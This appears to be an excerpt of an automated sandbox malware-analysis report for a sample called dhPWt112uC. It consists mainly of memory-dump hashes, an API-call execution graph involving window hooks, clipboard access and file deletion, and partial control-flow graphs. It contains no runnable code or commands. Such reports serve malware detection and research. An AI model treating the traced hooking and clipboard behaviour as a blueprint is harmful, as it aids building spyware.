                                                                                                            • Opcode Fuzzy Hash: c60b6f27f09a03207a324be5e1d8db7ff1aa14b93cba29c6d18c7a943806a8af
                                                                                                            • Instruction Fuzzy Hash: 2F1294B0C81745CADB19CF65EA5C18D3BB1BB4131CBD04A19D2651F2E1EBB8126EEF48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8126508e80d4e996454b86ac02904385ba1a3a8acc5db3e5e159aad20cb95eea
                                                                                                            • Instruction ID: 5816ea59bed8c735fdece8eb1ecec1ee6f18f6517aeb9010d8a101c89148f3d1
                                                                                                            • Opcode Fuzzy Hash: 8126508e80d4e996454b86ac02904385ba1a3a8acc5db3e5e159aad20cb95eea
                                                                                                            • Instruction Fuzzy Hash: D0E1F7B4E002598FCB14DFA9C5809AEFBB2FF88304F24D169E515AB356D731A941CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 82f472eea44eea2a85b4835c9b1dd736af49b59525ef2859934d34f89fd54db8
                                                                                                            • Instruction ID: 7fb747c689e7202e19764a41ce681954a518c060978629cfa7046ffa3006b676
                                                                                                            • Opcode Fuzzy Hash: 82f472eea44eea2a85b4835c9b1dd736af49b59525ef2859934d34f89fd54db8
                                                                                                            • Instruction Fuzzy Hash: D4E11C74E002598FCB14DFA9C5809AEFBB2FF89304F24D169E415AB356DB31A941CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c99428334ec79cb74b731a7d9d14660e1d762d6d8832b17b9ec53e5e9bdcc568
                                                                                                            • Instruction ID: b4108f91dff4476edb5d1ab65e08a35ac55eb1d01c7fc54a4d12d22bed85e94c
                                                                                                            • Opcode Fuzzy Hash: c99428334ec79cb74b731a7d9d14660e1d762d6d8832b17b9ec53e5e9bdcc568
                                                                                                            • Instruction Fuzzy Hash: B7E12974E002598FCB54DFA9C5809AEFBB6FF89304F24D169E505AB35AD730A941CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb1daa97ac9385ee8ef97ef19f5629117c7dbfaeb19e68ec8d30e364e306cad9
                                                                                                            • Instruction ID: 916ddf57fdfa59513e82e8d190f2505f49d109f944a357a90771e3ac54a77737
                                                                                                            • Opcode Fuzzy Hash: bb1daa97ac9385ee8ef97ef19f5629117c7dbfaeb19e68ec8d30e364e306cad9
                                                                                                            • Instruction Fuzzy Hash: C2E118B4E102598FCB14DFA9C5809AEFBB6FF89304F249169E405AB356D734A941CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 486ee00ec6a6fc4fd8c8fbe52390d63b0c3068f3a372386000af598889ede0a5
                                                                                                            • Instruction ID: 823d20a4c20a75df206dbc3346086dcc142142d61fa2dcf197e21bb3d27f6c61
                                                                                                            • Opcode Fuzzy Hash: 486ee00ec6a6fc4fd8c8fbe52390d63b0c3068f3a372386000af598889ede0a5
                                                                                                            • Instruction Fuzzy Hash: 6DD1063191075A8ADB01EB64D9A0A9DF7B1FFD5300F10C79AE10937255EB70AEC9CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 05bd81d072a43d76d10751be625430fa0f2c881f5dfcce0ea0dfcde940770b1d
                                                                                                            • Instruction ID: f0a2c6199d15a7b4a09f39372a35748f388a6874f11e2a895552bcff223b2da9
                                                                                                            • Opcode Fuzzy Hash: 05bd81d072a43d76d10751be625430fa0f2c881f5dfcce0ea0dfcde940770b1d
                                                                                                            • Instruction Fuzzy Hash: 78D1F73191075A8ADB01EB64D9A0A9DF7B1FFD5300F10C79AE11937255EB70AEC9CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 471c725231d4e52b01d3e9201301a7d5cf107e29c91f0700309ed46635676702
                                                                                                            • Instruction ID: 6fffc3be1dd03219fe8c0521f9a276c79cae48d27ee7c39b7e612f6de5d2cfc1
                                                                                                            • Opcode Fuzzy Hash: 471c725231d4e52b01d3e9201301a7d5cf107e29c91f0700309ed46635676702
                                                                                                            • Instruction Fuzzy Hash: DDA14C36E00206CFCF09DFA4C8405AEB7F2FF85300B1585BAE919AB266DB71E955CB44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08da7d8be2b4c28c77e686301ef49da4472cc66ae81e5fbc8f80b5ece05d1791
                                                                                                            • Instruction ID: 8a3a0507708dedc6800816499030cfd046f163fd9df04eac962023a2132cbf35
                                                                                                            • Opcode Fuzzy Hash: 08da7d8be2b4c28c77e686301ef49da4472cc66ae81e5fbc8f80b5ece05d1791
                                                                                                            • Instruction Fuzzy Hash: 20C15DB0C80745CFDB19CF25E95818D7BB1BB8131CB944A09D2656F2D1EBB4126EEF48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7943c7959b6bff10427698c27e71ec84193a8c1c64a47d96891176f8ec242a98
                                                                                                            • Instruction ID: 8fb4dc0403eb0b0829ac0fb9288e8518312fd6292eac8b553aa59331148febc7
                                                                                                            • Opcode Fuzzy Hash: 7943c7959b6bff10427698c27e71ec84193a8c1c64a47d96891176f8ec242a98
                                                                                                            • Instruction Fuzzy Hash: A8512970E002198FCB14DFA9C5805AEFBB2FF89304F24C169D418AB356D7319942CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7dec29d9d750731c0c023be57f2e829c30259339df025ea83cebd6d492e8955b
                                                                                                            • Instruction ID: 354f1cbb8ee0e518e1080e327e3d4ea2d2e09e6886a0afa3b85dabd6be1abf31
                                                                                                            • Opcode Fuzzy Hash: 7dec29d9d750731c0c023be57f2e829c30259339df025ea83cebd6d492e8955b
                                                                                                            • Instruction Fuzzy Hash: CA51FA70E002198FDB14DFAAC9805AEFBB2FF89304F24D169D419AB256DB359941CFA1

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:12.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:156
                                                                                                            Total number of Limit Nodes:17
                                                                                                            execution_graph 38557 6f86738 38558 6f867a0 CreateWindowExW 38557->38558 38560 6f8685c 38558->38560 38560->38560 38575 6f8c0c8 38576 6f8c122 OleGetClipboard 38575->38576 38577 6f8c162 38576->38577 38578 6f85688 38579 6f856d8 GetModuleHandleW 38578->38579 38580 6f856d2 38578->38580 38581 6f85705 38579->38581 38580->38579 38582 6f8a288 38583 6f8a289 GetCurrentProcess 38582->38583 38585 6f8a320 GetCurrentThread 38583->38585 38588 6f8a319 38583->38588 38586 6f8a35d GetCurrentProcess 38585->38586 38587 6f8a356 38585->38587 38589 6f8a393 38586->38589 38587->38586 38588->38585 38590 6f8a3bb GetCurrentThreadId 38589->38590 38591 6f8a3ec 38590->38591 38592 31a0848 38593 31a084e 38592->38593 38594 31a091b 38593->38594 38596 31a1340 38593->38596 38598 31a134f 38596->38598 38597 31a1454 38597->38593 38598->38597 38602 31a8219 38598->38602 38607 6f83aa0 38598->38607 38613 6f83a78 38598->38613 38603 31a8223 38602->38603 38604 31a82d9 38603->38604 38619 6f9fa58 38603->38619 38623 6f9fa48 38603->38623 38604->38598 38609 6f83ab2 38607->38609 38608 6f83b63 38608->38598 38609->38608 38627 6f8383c 38609->38627 38611 6f83b29 38632 6f8385c 38611->38632 38614 6f83a7d 38613->38614 38615 6f8383c GetModuleHandleW 38614->38615 38617 6f83b63 38614->38617 38616 6f83b29 38615->38616 38618 6f8385c KiUserCallbackDispatcher 38616->38618 38617->38598 38618->38617 38621 6f9fa6d 38619->38621 38620 6f9fc82 38620->38604 38621->38620 38622 6f9fc98 GlobalMemoryStatusEx GlobalMemoryStatusEx 38621->38622 38622->38621 38624 6f9fa58 38623->38624 38625 6f9fc82 38624->38625 38626 6f9fc98 GlobalMemoryStatusEx GlobalMemoryStatusEx 38624->38626 38625->38604 38626->38624 38628 6f83847 38627->38628 38636 6f84c4b 38628->38636 38642 6f84c60 38628->38642 38629 6f83d02 38629->38611 38633 6f83867 38632->38633 38635 6f8baa3 38633->38635 38677 6f8b134 38633->38677 38635->38608 38637 6f84c60 38636->38637 38648 6f851b0 38637->38648 38638 6f84d0e 38639 6f83fb4 GetModuleHandleW 38638->38639 38640 6f84d3a 38638->38640 38639->38640 38643 6f84c8b 38642->38643 38647 6f851b0 GetModuleHandleW 38643->38647 38644 6f84d0e 38645 6f83fb4 GetModuleHandleW 38644->38645 38646 6f84d3a 38644->38646 38645->38646 38647->38644 38649 6f8520d 38648->38649 38650 6f8528e 38649->38650 38653 6f8534a 38649->38653 38663 6f85350 38649->38663 38654 6f85350 38653->38654 38656 6f85389 38654->38656 38673 6f83fb4 38654->38673 38657 6f83fb4 GetModuleHandleW 38656->38657 38662 6f85554 38656->38662 38658 6f854da 38657->38658 38659 6f83fb4 GetModuleHandleW 38658->38659 38658->38662 38660 6f85528 38659->38660 38661 6f83fb4 GetModuleHandleW 38660->38661 38660->38662 38661->38662 38662->38650 38664 6f85365 38663->38664 38665 6f83fb4 GetModuleHandleW 38664->38665 38666 6f85389 38664->38666 38665->38666 38667 6f83fb4 GetModuleHandleW 38666->38667 38672 6f85554 38666->38672 38668 6f854da 38667->38668 38669 6f83fb4 GetModuleHandleW 38668->38669 38668->38672 38670 6f85528 38669->38670 38671 6f83fb4 GetModuleHandleW 38670->38671 38670->38672 38671->38672 38672->38650 38675 6f85690 GetModuleHandleW 38673->38675 38676 6f85705 38675->38676 38676->38656 38678 6f8bab8 KiUserCallbackDispatcher 38677->38678 38680 6f8bb26 38678->38680 38680->38633 38681 147d030 38682 147d048 38681->38682 38683 147d0a2 38682->38683 38690 6f8b4d0 38682->38690 38698 6f840dc 38682->38698 38702 6f840ec 38682->38702 38710 6f868ea 38682->38710 38716 6f840c8 38682->38716 38720 6f868f0 38682->38720 38691 6f8b4d5 38690->38691 38692 6f8b551 38691->38692 38694 6f8b541 38691->38694 38734 6f8b0e0 38692->38734 38726 6f8b678 38694->38726 38730 6f8b668 38694->38730 38695 6f8b54f 38699 6f840e7 38698->38699 38738 6f8697c 38699->38738 38701 6f86e27 38701->38683 38703 6f840f7 38702->38703 38704 6f8b551 38703->38704 38706 6f8b541 38703->38706 38705 6f8b0e0 CallWindowProcW 38704->38705 38707 6f8b54f 38705->38707 38708 6f8b678 CallWindowProcW 38706->38708 38709 6f8b668 CallWindowProcW 38706->38709 38708->38707 38709->38707 38711 6f86916 38710->38711 38712 6f840dc GetModuleHandleW 38711->38712 38713 6f86922 38712->38713 38714 6f840ec CallWindowProcW 38713->38714 38715 6f86937 38714->38715 38715->38683 38717 6f840d5 38716->38717 38718 6f8697c GetModuleHandleW 38717->38718 38719 6f86e27 38718->38719 38719->38683 38721 6f86916 38720->38721 38722 6f840dc GetModuleHandleW 38721->38722 38723 6f86922 38722->38723 38724 6f840ec CallWindowProcW 38723->38724 38725 6f86937 38724->38725 38725->38683 38727 6f8b686 38726->38727 38728 6f8b0e0 CallWindowProcW 38727->38728 38729 6f8b762 38727->38729 38728->38727 38729->38695 38731 6f8b686 38730->38731 38732 6f8b0e0 CallWindowProcW 38731->38732 38733 6f8b762 38731->38733 38732->38731 38733->38695 38735 6f8b0eb 38734->38735 38736 6f8b812 CallWindowProcW 38735->38736 38737 6f8b7c1 38735->38737 38736->38737 38737->38695 38739 6f86987 38738->38739 38740 6f83fb4 GetModuleHandleW 38739->38740 38741 6f86ef7 38739->38741 38740->38741 38561 6f8a4d0 DuplicateHandle 38562 6f8a566 38561->38562 38563 6f8de90 38564 6f8ded4 SetWindowsHookExA 38563->38564 38566 6f8df1a 38564->38566 38567 6f8bf30 38568 6f8bf3b 38567->38568 38569 6f8bf4b 38568->38569 38571 6f8b36c 38568->38571 38572 6f8bf80 OleInitialize 38571->38572 38574 6f8bfe4 38572->38574 38574->38569 38742 31a8040 38743 31a8086 DeleteFileW 38742->38743 38745 31a80bf 38743->38745

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 124 6f93568-6f93589 125 6f9358b-6f9358e 124->125 126 6f93590-6f935af 125->126 127 6f935b4-6f935b7 125->127 126->127 128 6f93d58-6f93d5a 127->128 129 6f935bd-6f935dc 127->129 131 6f93d5c 128->131 132 6f93d61-6f93d64 128->132 137 6f935de-6f935e1 129->137 138 6f935f5-6f935ff 129->138 131->132 132->125 134 6f93d6a-6f93d73 132->134 137->138 139 6f935e3-6f935f3 137->139 141 6f93605-6f93614 138->141 139->141 253 6f93616 call 6f93d88 141->253 254 6f93616 call 6f93d80 141->254 143 6f9361b-6f93620 144 6f9362d-6f9390a 143->144 145 6f93622-6f93628 143->145 166 6f93d4a-6f93d57 144->166 167 6f93910-6f939bf 144->167 145->134 176 6f939e8 167->176 177 6f939c1-6f939e6 167->177 179 6f939f1-6f93a04 call 6f92378 176->179 177->179 182 6f93a0a-6f93a2c call 6f92384 179->182 183 6f93d31-6f93d3d 179->183 182->183 187 6f93a32-6f93a3c 182->187 183->167 184 6f93d43 183->184 184->166 187->183 188 6f93a42-6f93a4d 187->188 188->183 189 6f93a53-6f93b29 188->189 201 6f93b2b-6f93b2d 189->201 202 6f93b37-6f93b67 189->202 201->202 206 6f93b69-6f93b6b 202->206 207 6f93b75-6f93b81 202->207 206->207 208 6f93be1-6f93be5 207->208 209 6f93b83-6f93b87 207->209 210 6f93beb-6f93c27 208->210 211 6f93d22-6f93d2b 208->211 209->208 212 6f93b89-6f93bb3 209->212 223 6f93c29-6f93c2b 210->223 224 6f93c35-6f93c43 210->224 211->183 211->189 219 6f93bc1-6f93bde call 6f92390 212->219 220 6f93bb5-6f93bb7 212->220 219->208 220->219 223->224 227 6f93c5a-6f93c65 224->227 228 6f93c45-6f93c50 224->228 232 6f93c7d-6f93c8e 227->232 233 6f93c67-6f93c6d 227->233 228->227 231 6f93c52 228->231 231->227 237 6f93c90-6f93c96 232->237 238 6f93ca6-6f93cb2 232->238 234 6f93c6f 233->234 235 6f93c71-6f93c73 233->235 234->232 235->232 239 6f93c98 237->239 240 6f93c9a-6f93c9c 237->240 242 6f93cca-6f93d1b 238->242 243 6f93cb4-6f93cba 238->243 239->238 240->238 242->211 244 6f93cbc 243->244 245 6f93cbe-6f93cc0 243->245 244->242 245->242 253->143 254->143
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 05f63adc75cf3b21c0be36be29b97404b4b1480c8a55a473049b77f8d9f9f083
                                                                                                            • Instruction ID: c18fb6e97dcebe97ffdbf8739a8b34aa29991dfa26f4d3e6bb115ffc4eed071f
                                                                                                            • Opcode Fuzzy Hash: 05f63adc75cf3b21c0be36be29b97404b4b1480c8a55a473049b77f8d9f9f083
                                                                                                            • Instruction Fuzzy Hash: 5B321D31E1061A8FDB54DF79C89459DB7B6FFC9300F10C6AAD409AB264EB30AD85CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 851 6f97e60-6f97e7e 852 6f97e80-6f97e83 851->852 853 6f97e85-6f97e9f 852->853 854 6f97ea4-6f97ea7 852->854 853->854 855 6f97ea9-6f97ec5 854->855 856 6f97eca-6f97ecd 854->856 855->856 858 6f97eda-6f97edd 856->858 859 6f97ecf-6f97ed9 856->859 860 6f97edf-6f97eed 858->860 861 6f97ef4-6f97ef6 858->861 867 6f97f06-6f97f1c 860->867 869 6f97eef 860->869 863 6f97ef8 861->863 864 6f97efd-6f97f00 861->864 863->864 864->852 864->867 871 6f97f22-6f97f2b 867->871 872 6f98137-6f98141 867->872 869->861 873 6f97f31-6f97f4e 871->873 874 6f98142-6f98150 871->874 881 6f98124-6f98131 873->881 882 6f97f54-6f97f7c 873->882 877 6f98152-6f98177 874->877 878 6f981a7-6f981b4 874->878 880 6f98179-6f9817c 877->880 885 6f981bf-6f981c1 878->885 883 6f9819f-6f981a2 880->883 884 6f9817e-6f9819a 880->884 881->871 881->872 882->881 908 6f97f82-6f97f8b 882->908 883->878 886 6f9824f-6f98252 883->886 884->883 887 6f981d9-6f981dd 885->887 888 6f981c3-6f981c9 885->888 889 6f98258-6f98267 886->889 890 6f98487-6f98489 886->890 892 6f981eb 887->892 893 6f981df-6f981e9 887->893 895 6f981cb 888->895 896 6f981cd-6f981cf 888->896 906 6f98269-6f98284 889->906 907 6f98286-6f982ca 889->907 898 6f9848b 890->898 899 6f98490-6f98493 890->899 897 6f981f0-6f981f2 892->897 893->897 895->887 896->887 902 6f98209-6f98242 897->902 903 6f981f4-6f981f7 897->903 898->899 899->880 905 6f98499-6f984a2 899->905 902->889 928 6f98244-6f9824e 902->928 903->905 906->907 915 6f9845b-6f98471 907->915 916 6f982d0-6f982e1 907->916 908->874 909 6f97f91-6f97fad 908->909 919 6f97fb3-6f97fdd 909->919 920 6f98112-6f9811e 909->920 915->890 923 6f982e7-6f98304 916->923 924 6f98446-6f98455 916->924 934 6f98108-6f9810d 919->934 935 6f97fe3-6f9800b 919->935 920->881 920->908 923->924 936 6f9830a-6f98400 call 6f96688 923->936 924->915 924->916 934->920 935->934 942 6f98011-6f9803f 935->942 985 6f9840e 936->985 986 6f98402-6f9840c 936->986 942->934 947 6f98045-6f9804e 942->947 947->934 949 6f98054-6f98086 947->949 956 6f98088-6f9808c 949->956 957 6f98091-6f980ad 949->957 956->934 959 6f9808e 956->959 957->920 960 6f980af-6f98106 call 6f96688 957->960 959->957 960->920 987 6f98413-6f98415 985->987 986->987 987->924 988 6f98417-6f9841c 987->988 989 6f9842a 988->989 990 6f9841e-6f98428 988->990 991 6f9842f-6f98431 989->991 990->991 991->924 992 6f98433-6f9843f 991->992 992->924
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 30576d3404bb8398ddc5d6506c8a818b0061c6c754724df4676ceb5acd6beac2
                                                                                                            • Instruction ID: 1bbf32309791fc234cb45de3700f4fba300f0d57aa857e125c377914525bbb5e
                                                                                                            • Opcode Fuzzy Hash: 30576d3404bb8398ddc5d6506c8a818b0061c6c754724df4676ceb5acd6beac2
                                                                                                            • Instruction Fuzzy Hash: B202AE31B002058FEF54DF68D9806AEB7E6FF85344F108829D41AAB394DB35EC86CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 478ba5e385a8f22a4d44ef56b1a6e76cf9d33d8871229df80351aadda858ee21
                                                                                                            • Instruction ID: 298585729349e832348724997dc26d5ded0c2b639e404e61644ec0e07ce99f13
                                                                                                            • Opcode Fuzzy Hash: 478ba5e385a8f22a4d44ef56b1a6e76cf9d33d8871229df80351aadda858ee21
                                                                                                            • Instruction Fuzzy Hash: A4A22434E102048FEB64CB68C584B9DBBF2FB49314F5484A9E409AB365DB35ED85CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e21c2b6e39036714fd52794187bbd4c80aed36d0e059a761ed7a1c14de2bab08
                                                                                                            • Instruction ID: 1e4f5b58a0d07ce837b20d0ea8703fa78451f1bf0cdc92156e559de94cfc2b69
                                                                                                            • Opcode Fuzzy Hash: e21c2b6e39036714fd52794187bbd4c80aed36d0e059a761ed7a1c14de2bab08
                                                                                                            • Instruction Fuzzy Hash: F7628D35E002049FEF54DB68D594AAEB7B2EF88314F148469E40ADB394DB35EC46CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8cc1bfa5a59ce8f6279aeb933b7eedc022893fed1cb6093220cc60e15aee61eb
                                                                                                            • Instruction ID: 7fa282b99b7dfc710f1b41a2570e72d44f08e9c7f7899afa4c5ea66ef1232c4f
                                                                                                            • Opcode Fuzzy Hash: 8cc1bfa5a59ce8f6279aeb933b7eedc022893fed1cb6093220cc60e15aee61eb
                                                                                                            • Instruction Fuzzy Hash: 52329E34F002059FEF54DB68E990BAEB7B6EB88714F108525D409EB394DB34EC46CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 52df03c956e9804e1f35f0c99a3ee0c458a37a9277fa7952117b0913b2ccb61d
                                                                                                            • Instruction ID: e3cb3e7de2dcd95a1cfe93a19f5c7f7d6678b6dbc83f5b322355e3fce060c7d7
                                                                                                            • Opcode Fuzzy Hash: 52df03c956e9804e1f35f0c99a3ee0c458a37a9277fa7952117b0913b2ccb61d
                                                                                                            • Instruction Fuzzy Hash: EF220471F002158FEF65DFA4D8846AEB7B2EB85320F14842AD959DB344DB34DC46CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 15cd805c1d6a955229f16b53177cda9d107351a5c2b71a6cf1a99ab1a449e33e
                                                                                                            • Instruction ID: 6de9ae48ea655db0b549e8d941935df80fea19947073bd257bd04a6963f35913
                                                                                                            • Opcode Fuzzy Hash: 15cd805c1d6a955229f16b53177cda9d107351a5c2b71a6cf1a99ab1a449e33e
                                                                                                            • Instruction Fuzzy Hash: 2D225270E101098FFF64CB68E5947AFB7B6EB49310F248926E409DB395CA35DC85CBA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 6f9ada8-6f9adc6 1 6f9adc8-6f9adcb 0->1 2 6f9adcd-6f9ade9 1->2 3 6f9adee-6f9adf1 1->3 2->3 4 6f9adf3-6f9adf7 3->4 5 6f9ae02-6f9ae05 3->5 7 6f9adfd 4->7 8 6f9afd4-6f9afde 4->8 9 6f9ae15-6f9ae18 5->9 10 6f9ae07-6f9ae10 5->10 7->5 11 6f9ae1e-6f9ae21 9->11 12 6f9afc5-6f9afce 9->12 10->9 15 6f9ae23-6f9ae30 11->15 16 6f9ae35-6f9ae38 11->16 12->8 14 6f9ae64-6f9ae6d 12->14 17 6f9afdf-6f9b016 14->17 18 6f9ae73-6f9ae77 14->18 15->16 19 6f9ae3a-6f9ae4d 16->19 20 6f9ae52-6f9ae55 16->20 29 6f9b018-6f9b01b 17->29 23 6f9ae7c-6f9ae7e 18->23 19->20 21 6f9ae5f-6f9ae62 20->21 22 6f9ae57-6f9ae5c 20->22 21->14 21->23 22->21 27 6f9ae80 23->27 28 6f9ae85-6f9ae88 23->28 27->28 28->1 30 6f9ae8e-6f9aeb2 28->30 31 6f9b02a-6f9b02d 29->31 32 6f9b01d call 6f9b2ff 29->32 47 6f9aeb8-6f9aec7 30->47 48 6f9afc2 30->48 33 6f9b033-6f9b06e 31->33 34 6f9b296-6f9b299 31->34 38 6f9b023-6f9b025 32->38 45 6f9b261-6f9b274 33->45 46 6f9b074-6f9b080 33->46 36 6f9b29b-6f9b2a5 34->36 37 6f9b2a6-6f9b2a9 34->37 39 6f9b2ab-6f9b2c7 37->39 40 6f9b2cc-6f9b2cf 37->40 38->31 39->40 43 6f9b2d1-6f9b2d5 40->43 44 6f9b2e0-6f9b2e2 40->44 43->33 51 6f9b2db 43->51 52 6f9b2e9-6f9b2ec 44->52 53 6f9b2e4 44->53 49 6f9b276 45->49 57 6f9b0a0-6f9b0e4 46->57 58 6f9b082-6f9b09b 46->58 59 6f9aec9-6f9aecf 47->59 60 6f9aedf-6f9af1a call 6f96688 47->60 48->12 49->34 51->44 52->29 54 6f9b2f2-6f9b2fc 52->54 53->52 77 6f9b100-6f9b13f 57->77 78 6f9b0e6-6f9b0f8 57->78 58->49 62 6f9aed1 59->62 63 6f9aed3-6f9aed5 59->63 75 6f9af1c-6f9af22 60->75 76 6f9af32-6f9af49 60->76 62->60 63->60 